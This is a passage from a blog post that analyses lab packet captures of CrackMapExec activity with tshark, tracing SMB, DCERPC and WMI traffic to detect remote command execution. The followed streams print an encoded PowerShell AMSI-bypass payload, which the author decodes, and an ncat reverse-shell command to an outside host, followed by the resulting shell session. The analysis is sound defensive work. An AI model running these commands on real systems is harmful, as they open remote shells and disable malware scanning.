10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 201 9.574589 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 206 9.591850 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3 207 9.593175 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3 210 9.607005 10.0.0.100 → 10.0.0.105 SMB2 238 Encrypted SMB3 211 9.607508 10.0.0.105 → 10.0.0.100 SMB2 262 Encrypted SMB3 214 9.617532 10.0.0.100 → 10.0.0.105 SMB2 294 Encrypted SMB3 215 9.617975 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3 218 9.628218 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3 219 9.628717 10.0.0.105 → 10.0.0.100 SMB2 258 Encrypted SMB3 222 9.639361 10.0.0.100 → 10.0.0.105 SMB2 258 Encrypted SMB3 .... 423 10.449068 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3 424 10.449465 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3 425 10.451778 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3 426 10.452430 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [RST, ACK] Seq=16173 Ack=14423 Win=0 Len=0
Uh Oh. From above we see that this traffic is also encrypted. This makes it difficult for our security monitoring tools to effectively do their jobs.
As the previous session was encrypted. Let's now see what we can get from the packets associated with the password policy enumeration.
Without further ado, let's take a look at the packet capture to see if we what type of traffic might be in here.
Looking at the protocol hierarchy, see some SMB and SMB2 traffic.
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -z io,phs -q =================================================================== Protocol Hierarchy Statistics Filter: eth frames:113 bytes:21694 arp frames:2 bytes:102 ip frames:111 bytes:21592 tcp frames:111 bytes:21592 nbss frames:78 bytes:19550 smb frames:4 bytes:508 smb2 frames:74 bytes:19042 ===================================================================
Looking at above, I would conclude that there is no encrypted traffic. Let's see if that is true.
Peeking first into SMB traffic, we see:
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb" 6 3.214791 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request 20 3.237020 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request 34 3.279046 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request 59 3.394125 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
From above, we see the SMB packets seems to all be associated with the SMB negotiate protocol request. I would assume at this point the server responded back stating that it would like to use SMB2, this is why we do not see any additional traffic.
Let's now look into the SMB2 traffic.
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb2" 7 3.215534 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 9 3.218110 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 10 3.218617 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 11 3.222438 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 12 3.224476 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 13 3.229892 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \ 14 3.230867 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 15 3.234048 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request 16 3.234344 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response 21 3.238371 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 23 3.241025 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 24 3.241635 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 25 3.248880 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 26 3.249527 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 27 3.256058 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 28 3.258185 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 35 3.279840 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 37 3.293799 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 38 3.294739 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 39 3.298425 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 41 3.299181 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 42 3.305931 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 43 3.308715 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 44 3.313429 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3 45 3.313913 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3 ..... 54 3.377248 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3 55 3.377657 10.0.0.105 → 10.0.0.100 SMB2 238 Encrypted SMB3 60 3.396247 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 62 3.400194 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 63 3.400920 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 64 3.412338 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 65 3.413306 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 67 3.434020 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 68 3.436640 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 69 3.451598 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3 77 3.522068 10.0.0.100 → 10.0.0.105 SMB2 258 Encrypted SMB3 78 3.522898 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3 ...... 99 3.704565 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3 100 3.704911 10.0.0.105 → 10.0.0.100 SMB2 246 Encrypted SMB3
Holy smack! Looks like yet another set of encrypted traffic. Well nothing else to see here at this time. Let's move on to see what things look like when we execute remote commands.
Let's now see what the communication looks like when crackmapexec runs a powershell command.
As always, when we first look at our pcap file, we look at the protocol hierarchy to understand what is in the file. Let's do that.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -z io,phs -q =================================================================== Protocol Hierarchy Statistics Filter: eth frames:247 bytes:82427 arp frames:8 bytes:408 ip frames:239 bytes:82019 udp frames:4 bytes:860 ssdp frames:4 bytes:860 tcp frames:235 bytes:81159 nbss frames:121 bytes:29648 smb frames:3 bytes:381 smb2 frames:118 bytes:29267 tcp.segments frames:1 bytes:2742 dcerpc frames:31 bytes:40114 isystemactivator frames:2 bytes:1644 remunk frames:2 bytes:300 dcerpc.stub_data frames:5 bytes:21630 dcerpc.fragments frames:1 bytes:790 ===================================================================
Looking at the SMB communication, we see below once again, that this is more than likely the client trying to communicatevia SMB version 1.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb" 16 43.408475 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request 30 43.435753 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request 42 43.463106 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
Once again let's look at the SMB2 communication.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb2" 17 43.409255 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 19 43.413105 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 20 43.413704 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 21 43.418281 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 22 43.418780 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 23 43.426458 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \ 24 43.427636 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 25 43.432235 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request 26 43.432623 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response 31 43.437344 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 33 43.440996 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 34 43.441606 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 35 43.446277 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 36 43.446815 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 37 43.455948 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 38 43.458155 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response 43 43.464624 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 45 43.468269 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request 46 43.468962 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response 49 43.473830 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE 50 43.474372 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE 51 43.481931 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator 52 43.484388 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response .... 227 47.334141 10.0.0.105 → 10.0.0.100 SMB2 234 Encrypted SMB3 228 47.338399 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3 229 47.343532 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
So far we seen that the majority of this tools SMB communication is encrypted. Let's see if there is anything we can learn from the "dcerpc" communication.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "dcerpc" 70 43.594887 10.0.0.100 → 10.0.0.105 DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: ISystemActivator V0.0 (32bit NDR), NTLMSSP_NEGOTIATE 71 43.595566 10.0.0.105 → 10.0.0.100 DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE 73 43.603971 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator 76 43.640433 10.0.0.100 → 10.0.0.105 ISystemActivator 566 RemoteCreateInstance request 77 43.645133 10.0.0.105 → 10.0.0.100 ISystemActivator 1078 RemoteCreateInstance response 81 43.682025 10.0.0.100 → 10.0.0.105 DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: f309ad18-d86a-11d0-a075-00c04fb68820 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE 82 43.682530 10.0.0.105 → 10.0.0.100 DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE 86 43.702770 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator 88 43.718458 10.0.0.100 → 10.0.0.105 DCERPC 210 Request: call_id: 2, Fragment: Single, opnum: 6, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0 89 43.719805 10.0.0.105 → 10.0.0.100 DCERPC 294 Response: call_id: 2, Fragment: Single, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0 90 43.727167 10.0.0.100 → 10.0.0.105 DCERPC 166 Alter_context: call_id: 3, Fragment: Single, 1 context items: IRemUnknown V0.0 (32bit NDR), NTLMSSP_NEGOTIATE 91 43.727812 10.0.0.105 → 10.0.0.100 DCERPC 402 Alter_context_resp: call_id: 3, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE 92 43.747847 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 3, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator 94 43.765583 10.0.0.100 → 10.0.0.105 IRemUnknown 182 RemRelease request Cnt=1 Refs=1-0 95 43.766108 10.0.0.105 → 10.0.0.100 IRemUnknown 118 RemRelease response -> S_OK 96 43.772729 10.0.0.100 → 10.0.0.105 DCERPC 166 Alter_context: call_id: 5, Fragment: Single, 1 context items: 9556dc99-828c-11cf-a37e-00aa003240c7 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE 97 43.773407 10.0.0.105 → 10.0.0.100 DCERPC 402 Alter_context_resp: call_id: 5, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE 98 43.788367 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 5, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator 100 43.827914 10.0.0.100 → 10.0.0.105 DCERPC 226 Request: call_id: 6, Fragment: Single, opnum: 6, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0 101 43.835340 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: 1st, Ctx: 2 103 43.835429 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2 105 43.835655 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2 107 43.835711 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2 109 43.835917 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2 111 43.835981 10.0.0.105 → 10.0.0.100 DCERPC 790 Response: call_id: 6, Fragment: Last, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0 114 44.446346 10.0.0.100 → 10.0.0.105 DCERPC 2050 Request: call_id: 7, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0 116 44.578642 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 7, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0 144 44.726719 10.0.0.100 → 10.0.0.105 DCERPC 2046 Request: call_id: 8, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0 147 44.753078 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 8, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0 177 44.960333 10.0.0.100 → 10.0.0.105 DCERPC 2738 Request: call_id: 9, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0 181 44.992849 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 9, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
The above looks interesting in that there are some cleartext. Let's follow the stream to see if we see anything of interest. Please note I've edited below for brevity but just tried to keep what I believe was important.
root@securitynik:~/cme# tshark -q -n -r cme-powershell.pcap -n -z follow,tcp,ascii,10.0.0.100:37794,10.0.0.105:49666 =================================================================== Follow: tcp,ascii Filter: ((ip.src eq 10.0.0.100 and tcp.srcport eq 37794) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666)) or ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 37794)) Node 0: 10.0.0.100:37794 Node 1: 10.0.0.105:49666 112 ....5..NTLMSSP.........p...".".........@.......V.......p...........5...S.E.C.U.R.I.T.Y.N.I.K.a.d.m.i.n.i.s.t.r.a.t.o.r....T...J7..7...bOk63ZTRY........i.4.............`J9K....Ok63ZTRY........S.E.C.N.I.K.-.2.K.1.9.....S.E.C.U.R.I.T.Y.N.I.K...:.S.E.C.N.I.K.-.2.K.1.9...s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l.....`J9K...... .c.i.f.s./.S.E.C.N.I.K.-.2.K.1.9......... .).yPDg...Q' S. 156 ................\................@ic#..................l..9H...*..?#....c..............././.../.r.o.o.t./.c.i.m.v.2................. .....................................................................................................q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1..C:\....C........... ....5......s.H......... ..........................................................................................................................................................................................................................................................p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\AZGdHz 2>&1..C:\.>A.......... ....5.........n..[H.... ..D.................object:Win32_ProcessStartup.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$........0......................__PARAMETERS..cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1..C:\.FF.......... ....5......hj..h$...... ===================================================================
As we can see from above, we seem to have some powershell code being executed. However, we do not see any results. This is still good as at least we have something of interes at this point. Let's copy this code and decode it at the Linux command lines
root@securitynik:~/cme# echo "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==" | base64 --decode [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{} get-process
From above, we an conlude that the "get-process" cmdlet was executed via powershell.
No more analysis for us to do on this pcap file via tshark.
Now that we know what a powershell command may look like when run via crackmapexec, let's take a look at the "normal" command being executed. In this case, if you remember in the first post we executed "ncat.exe", let's see how we may be able to detect this with raw packet analysis.
As always, let's first look at the protocol hierarchy of our pcap.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -z io,phs -q =================================================================== Protocol Hierarchy Statistics Filter: eth frames:356 bytes:86187 ip frames:356 bytes:86187 tcp frames:356 bytes:86187 nbss frames:160 bytes:34441 smb frames:3 bytes:381 smb2 frames:157 bytes:34060 dcerpc frames:31 bytes:39474 isystemactivator frames:2 bytes:1644 remunk frames:2 bytes:300 dcerpc.stub_data frames:5 bytes:21630 dcerpc.fragments frames:1 bytes:790 data frames:13 bytes:989 ssl frames:14 bytes:1075 tcp.segments frames:4 bytes:256 ===================================================================
Now that we have the protocol hierarchy, let's look at the TCP conversations
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z conv,tcp ================================================================================ TCP Conversations Filter:<No Filter> | <- | | -> | | Total | Relative | Duration | | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | | 10.0.0.100:57950 <-> 10.0.0.105:445 86 15850 100 15434 186 31284 0.023652000 20.0220 10.0.0.105:50602 <-> 10.0.0.100:443 29 1600 28 2126 57 3726 3.366351000 32.4745 10.0.0.105:49666 <-> 10.0.0.100:43388 26 9658 23 28398 49 38056 0.145434000 19.8985 10.0.0.100:57952 <-> 10.0.0.105:445 14 2952 15 2945 29 5897 0.042055000 19.9831 10.0.0.100:57948 <-> 10.0.0.105:445 9 1638 10 1166 19 2804 0.000000000 20.0444 10.0.0.100:60342 <-> 10.0.0.105:135 7 2808 9 1612 16 4420 0.098815000 19.9435 ================================================================================
If we look at the first conversation above, we see it has the most bytes (15850). However, as we look at the second conversation, we see it has the longest duration of all the conversations (3.366 seconds). While we can start with the first conversation, I will instead in the interest of time start with the second, simply because it has the longest duration.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -Y "( tcp.port == 50602 ) && ( tcp.port == 443 )" | more 190 3.366351 10.0.0.105 → 10.0.0.100 TCP 66 50602 → 443 [SYN, ECN, CWR] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1 191 3.366379 10.0.0.100 → 10.0.0.105 TCP 66 443 → 50602 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=128 192 3.366597 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [ACK] Seq=1 Ack=1 Win=2102272 Len=0 200 3.496322 10.0.0.105 → 10.0.0.100 TCP 96 50602 → 443 [PSH, ACK] Seq=1 Ack=1 Win=2102272 Len=42 201 3.496342 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=43 Win=29312 Len=0 202 3.496527 10.0.0.105 → 10.0.0.100 SSL 110 Continuation Data 203 3.496533 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=99 Win=29312 Len=0 204 3.511061 10.0.0.105 → 10.0.0.100 TCP 60 [TCP segment of a reassembled PDU] 205 3.511078 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=101 Win=29312 Len=0 ............ 347 30.994013 10.0.0.105 → 10.0.0.100 TCP 60 [TCP segment of a reassembled PDU] 348 30.994030 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=18 Ack=545 Win=29312 Len=0 349 30.994182 10.0.0.105 → 10.0.0.100 SSL 60 Continuation Data 350 30.994188 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=18 Ack=549 Win=29312 Len=0 351 35.836894 10.0.0.100 → 10.0.0.105 TCP 59 443 → 50602 [PSH, ACK] Seq=18 Ack=549 Win=29312 Len=5 352 35.837355 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [PSH, ACK] Seq=549 Ack=23 Win=2102272 Len=5 353 35.837371 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=23 Ack=554 Win=29312 Len=0 354 35.840523 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [FIN, ACK] Seq=554 Ack=23 Win=2102272 Len=0 355 35.840639 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [FIN, ACK] Seq=23 Ack=555 Win=29312 Len=0 356 35.840840 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [ACK] Seq=555 Ack=24 Win=2102272 Len=0
From above, we see port 443 which suggests SSL communication. However, we see no SSL negotiation which is typically done after the 3 way handshake is completed. Considering there is no SSL negotiation, is there a possibility that we may be able to see the cleartext data? Let's reassemble the session via following the tcp stream to see what we get.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:50602,10.0.0.100:443 | more =================================================================== Follow: tcp,ascii Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 50602) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 443)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 443) and (ip.dst eq 10.0.0.105 and t cp.dstport eq 50602)) Node 0: 10.0.0.105:50602 Node 1: 10.0.0.100:443 42 Microsoft Windows [Version 10.0.17763.253] (c) 2018 Microsoft Corporation. All rights reserved. C:\> whoami whoami securitynik\administrator C:\> net users net users User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest krbtgt nakia neysa nik Prague saadia securitynik The command completed with one or more errors. C:\> exit exit
Ahhh from above we see that even though the traffic is on port 443, we can see this communication is not encrypted. Interesting!
If we go through the other conversations, we see mostly unreadable traffic. However, as we follow the stream for the conversation with "10.0.0.105:49666" and "10.0.0.100:43388", we see the following:
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:49666,10.0.0.100:43388 | more =================================================================== Follow: tcp,ascii Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 43388)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 43388) and (ip.dst eq 10.0.0.105 a nd tcp.dstport eq 49666)) Node 0: 10.0.0.100:43388 Node 1: 10.0.0.105:49666 ...... .......................f..... ..D.................object:Win32_ProcessStartup................................................................................................................ ............................................................................................................................................................................................. ...........q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\YkGcDv 2>&1..C:\....ri.......... ....5.......,L....f.... ............................................................................................................................................................................................. ............................................................................................................................................................................................. ...........p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\egHJIv 2>&1..C:\..I.......... ....5....... h...r@.... ............................................................................................................................................................................................. ....................0......................__PARAMETERS..cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1..C:\.Cg.......... ....5..........WG......
Above we see from the rebuilt session that amongst other items, we see "ncat.exe" being executed with various arguments.
Ok. That's it for thist post.
References:
Wikipedia - ICMP protocol
Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis
No comments:
Post a Comment